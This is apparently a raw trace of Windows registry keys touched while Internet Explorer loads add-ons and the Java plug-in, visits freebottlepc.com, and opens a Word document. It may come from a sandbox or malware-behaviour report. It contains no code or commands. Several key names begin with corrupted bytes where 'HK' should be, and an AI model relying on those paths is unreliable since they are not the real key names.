HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Time
HKEY_CLASSES_ROOT\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{b4f3a835-0e21-4959-ba22-42b3008e02ff}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\URLREDIR.DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\LoadTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dbc80044-a445-435b-bc74-9c25c1c588a9}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DBC80044-A445-435B-BC74-9C25C1C588A9}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\jp2ssv.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{DBC80044-A445-435B-BC74-9C25C1C588A9}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\Time
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\10.0.0\UseNewJavaPlugin
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment
HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment\1.7.0
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\1.7.0\JavaHome
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xef\xae\x80\xc3\x95EY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore\LoadTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Suggested Sites\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Suggested Sites
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5F226421-415D-408D-9A09-0DCD94E25B48}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OpenDirectlyInApp
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{7b8a2d94-0ac9-11d1-896c-00c04fb6bfc4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InsecureQI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\OptimisticBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Safety\PrivacIE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\MinLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\RecommendedLevel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MediaTypeClass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\No3DBorder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\MenuUserExpanded
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History\freebottlepc.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C80120}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PrivacyAdvanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\UserChoice
HKEY_CURRENT_USER\Software\Classes\.doc
HKEY_LOCAL_MACHINE\Software\Classes\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1803
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\application/msword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_REPORT_CACHEFILE_KB925832
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_REPORT_CACHEFILE_KB925832
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\application/msword\UserChoice
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/msword\Extension
HKEY_CURRENT_USER\Software\Classes\Word.Document.8\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00020906-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\DocObject\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\iexplore.exe
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020906-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\InprocHandler
HKEY_CLASSES_ROOT\.htm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.htm\(Default)
HKEY_CLASSES_ROOT\.html
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.html\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mht\(Default)
HKEY_CLASSES_ROOT\.mhtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mhtml\(Default)
HKEY_CLASSES_ROOT\.shtm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtm\(Default)
HKEY_CLASSES_ROOT\.shtml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.shtml\(Default)
HKEY_CLASSES_ROOT\.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xml\(Default)
HKEY_CLASSES_ROOT\.xsl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xsl\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Word.Document.8\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Word.Document.8
HKEY_CLASSES_ROOT\Word.Document.8
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\EditFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\AttachmentExecute\{0002DF01-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Secure Mime Handlers\Word.Document.8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CLASSES_ROOT\.fxp
HKEY_CLASSES_ROOT\.gadget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gadget\(Default)
HKEY_CLASSES_ROOT\.grp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.grp\(Default)
HKEY_CLASSES_ROOT\.hlp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hlp\(Default)
HKEY_CLASSES_ROOT\.hta
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hta\(Default)
HKEY_CLASSES_ROOT\.inf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf\(Default)
HKEY_CLASSES_ROOT\.ins
HKEY_CLASSES_ROOT\.isp
HKEY_CLASSES_ROOT\.its
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\.jse
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.JSE\(Default)
HKEY_CLASSES_ROOT\.ksh
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.mad
HKEY_CLASSES_ROOT\.maf
HKEY_CLASSES_ROOT\.mag
HKEY_CLASSES_ROOT\.mam
HKEY_CLASSES_ROOT\.maq
HKEY_CLASSES_ROOT\.mar
HKEY_CLASSES_ROOT\.mas
HKEY_CLASSES_ROOT\.mat
HKEY_CLASSES_ROOT\.mau
HKEY_CLASSES_ROOT\.mav
HKEY_CLASSES_ROOT\.maw
HKEY_CLASSES_ROOT\.mcf
HKEY_CLASSES_ROOT\.mda
HKEY_CLASSES_ROOT\.mdb
HKEY_CLASSES_ROOT\.mde
HKEY_CLASSES_ROOT\.mdt
HKEY_CLASSES_ROOT\.mdw
HKEY_CLASSES_ROOT\.mdz
HKEY_CLASSES_ROOT\.msc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\(Default)
HKEY_CLASSES_ROOT\.msh
HKEY_CLASSES_ROOT\.mshxml
HKEY_CLASSES_ROOT\.msi
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msi\(Default)
HKEY_CLASSES_ROOT\.msp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msp\(Default)
HKEY_CLASSES_ROOT\.mst
HKEY_CLASSES_ROOT\.ops
HKEY_CLASSES_ROOT\.pcd
HKEY_CLASSES_ROOT\.pif
